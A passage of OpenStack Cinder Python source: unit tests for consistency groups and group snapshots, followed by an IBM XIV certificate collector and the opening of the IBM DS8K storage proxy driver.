'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group.id
}
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status)
self.assertEqual(10, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[6]
self.assertEqual('consistencygroup.update.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[8]
self.assertEqual('consistencygroup.update.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
cgvolumes = db.volume_get_all_by_group(self.context, group.id)
cgvol_ids = [cgvol['id'] for cgvol in cgvolumes]
# Verify volume is removed.
self.assertNotIn(volume.id, cgvol_ids)
# Verify volume is added.
self.assertIn(volume2.id, cgvol_ids)
self.volume_params['status'] = 'wrong-status'
volume3 = tests_utils.create_volume(
self.context,
consistencygroup_id=None,
**self.volume_params)
volume_id3 = volume3['id']
volume_get_orig = self.volume.db.volume_get
self.volume.db.volume_get = mock.Mock(
return_value={'status': 'wrong_status',
'id': volume_id3})
# Try to add a volume in wrong status
self.assertRaises(exception.InvalidVolume,
self.volume.update_consistencygroup,
self.context,
group,
add_volumes=volume_id3,
remove_volumes=None)
self.volume.db.volume_get.reset_mock()
self.volume.db.volume_get = volume_get_orig
def test_update_consistencygroup_volume_not_found(self):
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.assertRaises(exception.VolumeNotFound,
self.volume.update_consistencygroup,
self.context,
group,
fake.VOLUME_ID)
self.assertRaises(exception.VolumeNotFound,
self.volume.update_consistencygroup,
self.context,
group,
None,
fake.VOLUME_ID)
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"delete_consistencygroup",
return_value=({'status': 'deleted'}, []))
@mock.patch.object(driver.VolumeDriver,
"create_cgsnapshot",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"delete_cgsnapshot",
return_value=({'status': 'deleted'}, []))
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup_from_src",
return_value=(None, None))
@mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.'
'create_volume_from_snapshot')
@mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.'
'create_cloned_volume')
def test_create_consistencygroup_from_src(self,
mock_create_cloned_vol,
mock_create_vol_from_snap,
mock_create_from_src,
mock_delete_cgsnap,
mock_create_cgsnap,
mock_delete_cg,
mock_create_cg):
"""Test consistencygroup can be created and deleted."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
status=fields.ConsistencyGroupStatus.AVAILABLE)
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
status='available',
host=CONF.host,
size=1)
volume_id = volume['id']
cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume_id])
cgsnapshot = cgsnapshot_returns[0]
snapshot_id = cgsnapshot_returns[1][0]['id']
# Create CG from source CG snapshot.
group2 = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
cgsnapshot_id=cgsnapshot.id)
group2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id)
volume2 = tests_utils.create_volume(
self.context,
consistencygroup_id=group2.id,
snapshot_id=snapshot_id,
**self.volume_params)
self.volume.create_volume(self.context, volume2)
self.volume.create_consistencygroup_from_src(
self.context, group2, cgsnapshot=cgsnapshot)
cg2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id)
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group2.id,
}
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg2.status)
self.assertEqual(group2.id, cg2['id'])
self.assertEqual(cgsnapshot.id, cg2['cgsnapshot_id'])
self.assertIsNone(cg2['source_cgid'])
msg = self.notifier.notifications[2]
self.assertEqual('consistencygroup.create.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[4]
self.assertEqual('consistencygroup.create.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
if len(self.notifier.notifications) > 6:
self.assertFalse(self.notifier.notifications[6],
self.notifier.notifications)
self.assertEqual(6, len(self.notifier.notifications),
self.notifier.notifications)
self.volume.delete_consistencygroup(self.context, group2)
if len(self.notifier.notifications) > 10:
self.assertFalse(self.notifier.notifications[10],
self.notifier.notifications)
self.assertEqual(10, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[6]
self.assertEqual('consistencygroup.delete.start', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.AVAILABLE
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[8]
self.assertEqual('consistencygroup.delete.end', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.DELETED
self.assertDictEqual(expected, msg['payload'])
cg2 = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'), group2.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg2.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group2.id)
# Create CG from source CG.
group3 = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
source_cgid=group.id)
volume3 = tests_utils.create_volume(
self.context,
consistencygroup_id=group3.id,
source_volid=volume_id,
**self.volume_params)
self.volume.create_volume(self.context, volume3)
self.volume.create_consistencygroup_from_src(
self.context, group3, source_cg=group)
cg3 = objects.ConsistencyGroup.get_by_id(self.context, group3.id)
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg3.status)
self.assertEqual(group3.id, cg3.id)
self.assertEqual(group.id, cg3.source_cgid)
self.assertIsNone(cg3.cgsnapshot_id)
self.volume.delete_cgsnapshot(self.context, cgsnapshot)
self.volume.delete_consistencygroup(self.context, group)
def test_create_consistencygroup_from_src_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.create_from_src,
self.context, 'cg', 'desc', cgsnapshot_id=None,
source_cgid=cg.id)
def test_delete_consistencygroup_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.delete, self.context, cg)
def test_create_cgsnapshot_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.create_cgsnapshot,
self.context, cg, 'cg', 'desc')
def test_delete_cgsnapshot_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cgsnap = tests_utils.create_cgsnapshot(self.context, cg.id)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.delete_cgsnapshot,
self.context, cgsnap)
def test_sort_snapshots(self):
vol1 = {'id': fake.VOLUME_ID, 'name': 'volume 1',
'snapshot_id': fake.SNAPSHOT_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
vol2 = {'id': fake.VOLUME2_ID, 'name': 'volume 2',
'snapshot_id': fake.SNAPSHOT2_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
vol3 = {'id': fake.VOLUME3_ID, 'name': 'volume 3',
'snapshot_id': fake.SNAPSHOT3_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
snp1 = {'id': fake.SNAPSHOT_ID, 'name': 'snap 1',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp2 = {'id': fake.SNAPSHOT2_ID, 'name': 'snap 2',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp3 = {'id': fake.SNAPSHOT3_ID, 'name': 'snap 3',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp1_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp1)
snp2_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp2)
snp3_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp3)
volumes = []
snapshots = []
volumes.append(vol1)
volumes.append(vol2)
volumes.append(vol3)
snapshots.append(snp2_obj)
snapshots.append(snp3_obj)
snapshots.append(snp1_obj)
i = 0
for vol in volumes:
snap = snapshots[i]
i += 1
self.assertNotEqual(vol['snapshot_id'], snap.id)
sorted_snaps = self.volume._sort_snapshots(volumes, snapshots)
i = 0
for vol in volumes:
snap = sorted_snaps[i]
i += 1
self.assertEqual(vol['snapshot_id'], snap.id)
snapshots[2]['id'] = fake.WILL_NOT_BE_FOUND_ID
self.assertRaises(exception.SnapshotNotFound,
self.volume._sort_snapshots,
volumes, snapshots)
self.assertRaises(exception.InvalidInput,
self.volume._sort_snapshots,
volumes, [])
def test_sort_source_vols(self):
vol1 = {'id': '1', 'name': 'volume 1',
'source_volid': '1',
'consistencygroup_id': '2'}
vol2 = {'id': '2', 'name': 'volume 2',
'source_volid': '2',
'consistencygroup_id': '2'}
vol3 = {'id': '3', 'name': 'volume 3',
'source_volid': '3',
'consistencygroup_id': '2'}
src_vol1 = {'id': '1', 'name': 'source vol 1',
'consistencygroup_id': '1'}
src_vol2 = {'id': '2', 'name': 'source vol 2',
'consistencygroup_id': '1'}
src_vol3 = {'id': '3', 'name': 'source vol 3',
'consistencygroup_id': '1'}
volumes = []
src_vols = []
volumes.append(vol1)
volumes.append(vol2)
volumes.append(vol3)
src_vols.append(src_vol2)
src_vols.append(src_vol3)
src_vols.append(src_vol1)
i = 0
for vol in volumes:
src_vol = src_vols[i]
i += 1
self.assertNotEqual(vol['source_volid'], src_vol['id'])
sorted_src_vols = self.volume._sort_source_vols(volumes, src_vols)
i = 0
for vol in volumes:
src_vol = sorted_src_vols[i]
i += 1
self.assertEqual(vol['source_volid'], src_vol['id'])
src_vols[2]['id'] = '9999'
self.assertRaises(exception.VolumeNotFound,
self.volume._sort_source_vols,
volumes, src_vols)
self.assertRaises(exception.InvalidInput,
self.volume._sort_source_vols,
volumes, [])
def _create_cgsnapshot(self, group_id, volume_ids, size='0'):
"""Create a cgsnapshot object."""
cgsnap = objects.CGSnapshot(self.context)
cgsnap.user_id = fake.USER_ID
cgsnap.project_id = fake.PROJECT_ID
cgsnap.consistencygroup_id = group_id
cgsnap.status = "creating"
cgsnap.create()
# Create snapshot list
for volume_id in volume_ids:
snaps = []
snap = objects.Snapshot(context.get_admin_context())
snap.volume_size = size
snap.user_id = fake.USER_ID
snap.project_id = fake.PROJECT_ID
snap.volume_id = volume_id
snap.status = "available"
snap.cgsnapshot_id = cgsnap.id
snap.create()
snaps.append(snap)
return cgsnap, snaps
@ddt.data((CONF.host, None), (CONF.host + 'fake', 'mycluster'))
@ddt.unpack
@mock.patch('cinder.tests.unit.fake_notifier.FakeNotifier._notify')
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
autospec=True,
return_value={'status': 'available'})
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
autospec=True,
return_value=({'status': 'deleted'}, []))
@mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot',
autospec=True,
return_value=({'status': 'available'}, []))
@mock.patch('cinder.volume.driver.VolumeDriver.delete_cgsnapshot',
autospec=True,
return_value=({'status': 'deleted'}, []))
def test_create_delete_cgsnapshot(self, host, cluster,
mock_del_cgsnap, mock_create_cgsnap,
mock_del_cg, _mock_create_cg,
mock_notify):
"""Test cgsnapshot can be created and deleted."""
self.volume.cluster = cluster
group = tests_utils.create_consistencygroup(
self.context,
host=host,
cluster_name=cluster,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.volume_params['host'] = host
volume = tests_utils.create_volume(
self.context,
cluster_name=cluster,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end']))
cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume.id])
cgsnapshot = cgsnapshot_returns[0]
self.volume.create_cgsnapshot(self.context, cgsnapshot)
self.assertEqual(cgsnapshot.id,
objects.CGSnapshot.get_by_id(
context.get_admin_context(),
cgsnapshot.id).id)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end'],
['INFO', 'cgsnapshot.create.start'],
['INFO', 'snapshot.create.start'],
['INFO', 'cgsnapshot.create.end'],
['INFO', 'snapshot.create.end']))
self.volume.delete_cgsnapshot(self.context, cgsnapshot)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end'],
['INFO', 'cgsnapshot.create.start'],
['INFO', 'snapshot.create.start'],
['INFO', 'cgsnapshot.create.end'],
['INFO', 'snapshot.create.end'],
['INFO', 'cgsnapshot.delete.start'],
['INFO', 'snapshot.delete.start'],
['INFO', 'cgsnapshot.delete.end'],
['INFO', 'snapshot.delete.end']))
cgsnap = objects.CGSnapshot.get_by_id(
context.get_admin_context(read_deleted='yes'),
cgsnapshot.id)
self.assertEqual('deleted', cgsnap.status)
self.assertRaises(exception.NotFound,
objects.CGSnapshot.get_by_id,
self.context,
cgsnapshot.id)
self.volume.delete_consistencygroup(self.context, group)
self.assertTrue(mock_create_cgsnap.called)
self.assertTrue(mock_del_cgsnap.called)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
return_value={'status': 'available'})
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
return_value=({'status': 'deleted'}, []))
def test_delete_consistencygroup_correct_host(self,
mock_del_cg,
_mock_create_cg):
"""Test consistencygroup can be deleted.
Test consistencygroup can be deleted when volumes are on
the correct volume node.
"""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
status='creating',
size=1)
self.volume.host = 'host1@backend1'
self.volume.create_volume(self.context, volume)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'),
group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
mock.Mock(return_value={'status': 'available'}))
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
return_value=({'status': 'deleted'}, []))
def test_delete_consistencygroup_cluster(self, mock_del_cg):
"""Test consistencygroup can be deleted.
Test consistencygroup can be deleted when volumes are on
the correct volume node.
"""
cluster_name = 'cluster@backend1'
self.volume.host = 'host2@backend1'
self.volume.cluster = cluster_name
group = tests_utils.create_consistencygroup(
self.context,
host=CONF.host + 'fake',
cluster_name=cluster_name,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
cluster_name=cluster_name,
status='creating',
size=1)
self.volume.create_volume(self.context, volume)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'),
group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
return_value={'status': 'available'})
def test_delete_consistencygroup_wrong_host(self, *_mock_create_cg):
"""Test consistencygroup cannot be deleted.
Test consistencygroup cannot be deleted when volumes in the
group are not local to the volume node.
"""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
status='creating',
size=1)
self.volume.host = 'host1@backend2'
self.volume.create_volume(self.context, volume)
self.assertRaises(exception.Invalid,
self.volume.delete_consistencygroup,
self.context,
group)
cg = objects.ConsistencyGroup.get_by_id(self.context, group.id)
# Group is not deleted
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status)
def test_create_volume_with_consistencygroup_invalid_type(self):
"""Test volume creation with ConsistencyGroup & invalid volume type."""
vol_type = db.volume_type_create(
context.get_admin_context(),
dict(name=conf_fixture.def_vol_type, extra_specs={})
)
vol_type = objects.VolumeType.get_by_id(self.context,
vol_type.id)
cg = objects.ConsistencyGroup(self.context,
id=fake.CONSISTENCY_GROUP_ID,
name='cg1',
volume_type_id=vol_type.id)
fake_type = fake_volume.fake_volume_type_obj(
self.context,
id=fake.VOLUME_TYPE_ID,
name='fake')
vol_api = cinder.volume.api.API()
# Volume type must be provided when creating a volume in a
# consistency group.
self.assertRaises(exception.InvalidInput,
vol_api.create,
self.context, 1, 'vol1', 'volume 1',
consistencygroup=cg)
# Volume type must be valid.
self.assertRaises(exception.InvalidInput,
vol_api.create,
self.context, 1, 'vol1', 'volume 1',
volume_type=fake_type,
consistencygroup=cg)
@mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot',
autospec=True,
return_value=({'status': 'available'}, []))
def test_create_cgsnapshot_with_bootable_volumes(self, mock_create_cgsnap):
"""Test cgsnapshot can be created and deleted."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
# Create a bootable volume
bootable_vol_params = {'status': 'creating', 'host': CONF.host,
'size': 1, 'bootable': True}
bootable_vol = tests_utils.create_volume(self.context,
consistencygroup_id=group.id,
**bootable_vol_params)
# Create a common volume
self.volume.create_volume(self.context, bootable_vol)
volume_ids = [volume.id, bootable_vol.id]
cgsnapshot_returns = self._create_cgsnapshot(group.id, volume_ids)
cgsnapshot = cgsnapshot_returns[0]
self.volume.create_cgsnapshot(self.context, cgsnapshot)
self.assertEqual(cgsnapshot.id,
objects.CGSnapshot.get_by_id(
context.get_admin_context(),
cgsnapshot.id).id)
self.assertTrue(mock_create_cgsnap.called)
```
#### File: ibm/ibm_storage/certificate.py
```python
import os
import tempfile
from oslo_log import log as logging
from cinder.i18n import _LE
LOG = logging.getLogger(__name__)
class CertificateCollector(object):
def __init__(self, paths=None):
self.paths_checked = [
'/etc/ssl/certs', '/etc/ssl/certs/xiv', '/etc/pki', '/etc/pki/xiv']
if paths:
self.paths_checked.extend(paths)
self.paths_checked = set(self.paths_checked)
self.tmp_fd = None
self.tmp_path = None
def collect_certificate(self):
self.tmp_fd, self.tmp_path = tempfile.mkstemp()
for path in self.paths_checked:
if os.path.exists(path) and os.path.isdir(path):
dir_contents = os.listdir(path)
for f in dir_contents:
full_path = os.path.join(path, f)
if (os.path.isfile(full_path) and
f.startswith('XIV') and
f.endswith('.pem')):
try:
cert_file = open(full_path, 'r')
os.write(self.tmp_fd, cert_file.read())
cert_file.close()
except Exception:
LOG.exception(_LE("Failed to process certificate"))
os.close(self.tmp_fd)
fsize = os.path.getsize(self.tmp_path)
if fsize > 0:
return self.tmp_path
else:
return None
def free_certificate(self):
if self.tmp_path:
try:
os.remove(self.tmp_path)
except Exception:
pass
self.tmp_path = None
```
#### File: ibm/ibm_storage/ds8k_proxy.py
```python
import ast
import json
import six
from oslo_config import cfg
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _, _LI, _LW, _LE
from cinder.objects import fields
from cinder.utils import synchronized
import cinder.volume.drivers.ibm.ibm_storage as storage
from cinder.volume.drivers.ibm.ibm_storage import ds8k_helper as helper
from cinder.volume.drivers.ibm.ibm_storage \
import ds8k_replication as replication
from cinder.volume.drivers.ibm.ibm_storage import ds8k_restclient as restclient
from cinder.volume.drivers.ibm.ibm_storage import proxy
from cinder.volume.drivers.ibm.ibm_storage import strings
from cinder.volume import group_types
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
VALID_OS400_VOLUME_TYPES = {
'A01': 8, 'A02': 17, 'A04': 66,
'A05': 33, 'A06': 132, 'A07': 263,
'A81': 8, 'A82': 17, 'A84': 66,
'A85': 33, 'A86': 132, 'A87': 263,
'050': '', '099': ''
}
EXTRA_SPECS_DEFAULTS = {
'thin': True,
'replication_enabled': False,
'consistency': False,
'os400': '',
'consistent_group_replication_enabled': False,
'group_replication_enabled': False,
'consistent_group_snapshot_enabled': False,
}
ds8k_opts = [
cfg.StrOpt(
'ds8k_devadd_unitadd_mapping',
default='',
help='Mapping between IODevice address and unit address.'),
cfg.StrOpt(
'ds8k_ssid_prefix',
default='FF',
help='Set the first two digits of SSID'),
cfg.StrOpt(
'ds8k_host_type',
default='auto',
help='Set to zLinux if your OpenStack version is prior to '
'Liberty and you\'re connecting to zLinux systems. '
'Otherwise set to auto. Valid values for this parameter '
'are: %s.' % six.text_type(helper.VALID_HOST_TYPES)[1:-1])
]
CONF = cfg.CONF
CONF.register_opts(ds8k_opts)
class Lun(object):
"""provide volume information for driver from volume db object."""
class FakeLun(object):
def __init__(self, lun, **overrides):
self.size = lun.size
self.os_id = 'fake_os_id'
self.cinder_name = lun.cinder_name
self.is_snapshot = lun.is_snapshot
self.ds_name = lun.ds_name
self.ds_id = None
self.type_thin = lun.type_thin
self.type_os400 = lun.type_os400
self.data_type = lun.data_type
self.type_replication = lun.type_replication
if not self.is_snapshot and self.type_replication:
self.replica_ds_name = lun.replica_ds_name
self.replication_driver_data = lun.replication_driver_data
self.replication_status = lun.replication_status
self.lss_pair = lun.lss_pair
def update_volume(self, lun):
volume_update = lun.get_volume_update()
volume_update['provider_location'] = six.text_type({
'vol_hex_id': self.ds_id})
volume_update['metadata']['vol_hex_id'] = self.ds_id
return volume_update
def __init__(self, volume, is_snapshot=False):
volume_type_id = volume.get('volume_type_id')
self.specs = volume_types.get_volume_type_extra_specs(
volume_type_id) if volume_type_id else {}
os400 = self.specs.get(
'drivers:os400', EXTRA_SPECS_DEFAULTS['os400']
).strip().upper()
self.type_thin = self.specs.get(
'drivers:thin_provision', '%s' % EXTRA_SPECS_DEFAULTS['thin']
).upper() == 'True'.upper()
self.type_replication = self.specs.get(
'replication_enabled',
'<is> %s' % EXTRA_SPECS_DEFAULTS['replication_enabled']
).upper() == strings.METADATA_IS_TRUE
if volume.provider_location:
provider_location = ast.literal_eval(volume.provider_location)
self.ds_id = provider_location[six.text_type('vol_hex_id')]
else:
self.ds_id = None
self.cinder_name = volume.display_name
self.lss_pair = {}
self.is_snapshot = is_snapshot
if self.is_snapshot:
self.size = volume.volume_size
# ds8k supports at most 16 chars
self.ds_name = (
"OS%s:%s" % ('snap', helper.filter_alnum(self.cinder_name))
)[:16]
else:
self.size = volume.size
self.ds_name = (
"OS%s:%s" % ('vol', helper.filter_alnum(self.cinder_name))
)[:16]
self.replica_ds_name = (
"OS%s:%s" % ('Replica', helper.filter_alnum(self.cinder_name))
)[:16]
self.replication_status = volume.replication_status
self.replication_driver_data = (
json.loads(volume.replication_driver_data)
if volume.replication_driver_data else {})
if self.replication_driver_data:
# now only support one replication target.
replication_target = sorted(
self.replication_driver_data.values())[0]
replica_id = replication_target[six.text_type('vol_hex_id')]
self.lss_pair = {
'source': (None, self.ds_id[0:2]),
'target': (None, replica_id[0:2])
}
if os400:
if os400 not in VALID_OS400_VOLUME_TYPES.keys():
msg = (_("The OS400 volume type provided, %s, is not "
"a valid volume type.") % os400)
raise restclient.APIException(data=msg)
self.type_os400 = os400
if os400 not in ['050', '099']:
self.size = VALID_OS400_VOLUME_TYPES[os400]
else:
self.type_os400 = EXTRA_SPECS_DEFAULTS['os400']
self.data_type = self._create_datatype(self.type_os400)
self.os_id = volume.id
self.status = volume.status
self.volume = volume
def _get_volume_metadata(self, volume):
if 'volume_metadata' in volume:
metadata = volume.volume_metadata
return {m['key']: m['value'] for m in metadata}
if 'metadata' in volume:
return volume.metadata
return {}
def _get_snapshot_metadata(self, snapshot):
if 'snapshot_metadata' in snapshot:
metadata = snapshot.snapshot_metadata
return {m['key']: m['value'] for m in metadata}
if 'metadata' in snapshot:
return snapshot.metadata
return {}
def shallow_copy(self, **overrides):
return Lun.FakeLun(self, **overrides)
def _create_datatype(self, t):
if t[0:2] == 'A0':
datatype = t + ' FB 520P'
elif t[0:2] == 'A8':
datatype = t + ' FB 520U'
elif t == '050':
datatype = t + ' FB 520UV'
elif t == '099':
datatype = t + ' FB 520PV'
else:
datatype = None
return datatype
# Note: updating metadata in vol related funcs deletes all prior metadata
def get_volume_update(self):
volume_update = {}
volume_update['provider_location'] = six.text_type(
{'vol_hex_id': self.ds_id})
# update metadata
if self.is_snapshot:
metadata = self._get_snapshot_metadata(self.volume)
else:
metadata = self._get_volume_metadata(self.volume)
if self.type_replication:
metadata['replication'] = six.text_type(
self.replication_driver_data)
else:
metadata.pop('replication', None)
volume_update['replication_driver_data'] = json.dumps(
self.replication_driver_data)
volume_update['replication_status'] = self.replication_status
metadata['data_type'] = (self.data_type if self.data_type else
metadata['data_type'])
metadata['vol_hex_id'] = self.ds_id
volume_update['metadata'] = metadata
# need to update volume size for OS400
if self.type_os400:
volume_update['size'] = self.size
return volume_update
class Group(object):
"""provide group information for driver from group db object."""
def __init__(self, group):
gid = group.get('group_type_id')
specs = group_types.get_group_type_specs(gid) if gid else {}
self.type_cg_snapshot = specs.get(
'consistent_group_snapshot_enabled', '<is> %s' %
EXTRA_SPECS_DEFAULTS['consistent_group_snapshot_enabled']
).upper() == strings.METADATA_IS_TRUE
class DS8KProxy(proxy.IBMStorageProxy):
prefix = "[IBM DS8K STORAGE]:"
def __init__(self, storage_info, logger, exception, driver,
active_backend_id=None, HTTPConnectorObject=None):
proxy.IBMStorageProxy.__init__(
self, storage_info, logger, exception, driver, active_backend_id)
self._helper = None
self._replication = None
self._connector_obj = HTTPConnectorObject
self._replication_enabled = False
self._active_backend_id = active_backend_id
self.configuration = driver.configuration
self.configuration.append_config_values(ds8k_opts)
@proxy._trace_time
def setup(self, ctxt):
LOG.info(_LI("Initiating connection to IBM DS8K storage system."))
connection_type = self.configuration.safe_get('connection_type')
replication_devices = self.configuration.safe_get('replication_device')
if connection_type == storage.XIV_CONNECTION_TYPE_FC:
if not replication_devices:
self._helper = helper.DS8KCommonHelper(self.configuration,
self._connector_obj)
else:
self._helper = (
helper.DS8KReplicationSourceHelper(self.configuration,
self._connector_obj))
elif connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD:
self._helper = helper.DS8KECKDHelper(self.configuration,
self._connector_obj)
else:
err = (_("Param [connection_type] %s is invalid.")
% connection_type)
raise exception.InvalidParameterValue(err=err)
if replication_devices:
self._do_replication_setup(replication_devices, self._helper)
@proxy.logger
def _do_replication_setup(self, devices, src_helper):
if len(devices) >= 2:
err = _("Param [replication_device] is invalid, Driver "
"support only one replication target.")
raise exception.InvalidParameterValue(err=err)
self._replication = replication.Replication(src_helper, devices[0])
self._replication.check_physical_links()
self._replication.check_connection_type()
if self._active_backend_id:
self._switch_backend_connection(self._active_backend_id)
self._replication_enabled = True
@proxy.logger
def _switch_backend_connection(self, backend_id, repl_luns=None):
repl_luns = self._replication.switch_source_and_target(backend_id,
repl_luns)
self._helper = self._replication._source_helper
return repl_luns
@staticmethod
def _b2gb(b):
return b // (2 ** 30)
@proxy._trace_time
def _update_stats(self):
if self._helper:
storage_pools = self._helper.get_pools()
if not len(storage_pools):
msg = _('No pools found - make sure san_clustername '
'is defined in the config file and that the '
'pools exist on the storage.')
LOG.error(msg)
raise exception.CinderException(message=msg)
else:
msg = (_('Backend %s is not initialized.')
% self.configuration.volume_backend_name)
raise exception.CinderException(data=msg)
stats = {
"volume_backend_name": self.configuration.volume_backend_name,
"serial_number": self._helper.backend['storage_unit'],
"extent_pools": self._helper.backend['pools_str'],
"vendor_name": 'IBM',
"driver_version": self.full_version,
"storage_protocol": self._helper.get_connection_type(),
"total_capacity_gb": self._b2gb(
sum(p['cap'] for p in storage_pools.values())),
"free_capacity_gb": self._b2gb(
sum(p['capavail'] for p in storage_pools.values())),
"reserved_percentage": self.configuration.reserved_percentage,
"consistencygroup_support": True,
"consistent_group_snapshot_enabled": True,
"multiattach": False
}
if self._replication_enabled:
stats['replication_enabled'] = self._replication_enabled
self.meta['stat'] = stats
def _assert(self, assert_condition, exception_message=''):
if not assert_condition:
LOG.error(exception_message)
raise restclient.APIException(data=exception_message)
@proxy.logger
def _create_lun_helper(self, lun, pool=None, find_new_pid=True):
# DS8K supports ECKD ESE volume from 8.1
connection_type = self._helper.get_connection_type()
if connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD:
thin_provision = self._helper.get_thin_provision()
if lun.type_thin and thin_provision:
if lun.type_replication:
msg = _("The primary or the secondary storage "
"can not support ECKD ESE volume.")
else:
msg = _("Backend can not support ECKD ESE volume.")
LOG.error(msg)
raise restclient.APIException(message=msg)
# There is a time gap between find available LSS slot and
# lun actually occupies it.
excluded_lss = []
while True:
try:
if lun.type_replication and not lun.is_snapshot:
lun.lss_pair = self._replication.find_available_lss_pair(
excluded_lss)
else:
lun.lss_pair['source'] = self._helper.find_available_lss(
